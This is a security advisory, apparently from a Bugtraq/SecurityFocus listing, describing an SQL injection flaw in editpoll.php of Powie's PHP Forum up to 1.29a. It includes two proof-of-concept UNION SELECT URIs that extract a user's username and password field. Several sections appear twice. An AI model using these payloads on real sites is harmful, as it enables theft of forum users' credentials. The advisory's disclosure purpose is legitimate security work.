Powie's PHP Forum EditPoll.PHP SQL Injection Vulnerability
BID:21144
Info
Powie's PHP Forum EditPoll.PHP SQL Injection Vulnerability
| Bugtraq ID: | 21144 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 17 2006 12:00AM |
| Updated: | Nov 21 2006 10:40PM |
| Credit: | SHiKaA is credited with the discovery of this vulnerability. |
| Vulnerable: |
Powie PSCRIPT Forum 1.26 Powie PSCRIPT Forum 1.25 Powie PSCRIPT Forum 1.24 Powie PSCRIPT Forum 1.23 Powie PSCRIPT Forum 1.22 Powie PSCRIPT Forum 1.21 Powie PSCRIPT Forum 1.20 Powie PSCRIPT Forum 1.19 Powie PSCRIPT Forum 1.18 Powie PSCRIPT Forum 1.17 Powie PSCRIPT Forum 1.16 Powie PForum 1.15 Powie PForum 1.14 Powie PForum 1.14 Powie PForum 1.13 Powie PForum 1.12 Powie PForum 1.11 Powie PForum 1.29a |
| Not Vulnerable: | |
Discussion
Powie's PHP Forum EditPoll.PHP SQL Injection Vulnerability
Powie PHP Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Powie PHP Forum 1.29a and prior versions are vulnerable; other versions may also be affected.
Powie PHP Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Powie PHP Forum 1.29a and prior versions are vulnerable; other versions may also be affected.
Exploit / POC
Powie's PHP Forum EditPoll.PHP SQL Injection Vulnerability
An attacker can exploit this issue via a web client.
The following proof-of-concept URIs are available:
User:
http://www.example.com/editpoll.php?id=-1 UNION SELECT null,null,username,null FROM pfuser where id=1
Pass:
http://www.example.com/editpoll.php?id=-1 UNION SELECT null,null,pwd,null FROM pfuser where id=1
An attacker can exploit this issue via a web client.
The following proof-of-concept URIs are available:
User:
http://www.example.com/editpoll.php?id=-1 UNION SELECT null,null,username,null FROM pfuser where id=1
Pass:
http://www.example.com/editpoll.php?id=-1 UNION SELECT null,null,pwd,null FROM pfuser where id=1
Solution / Fix
Powie's PHP Forum EditPoll.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].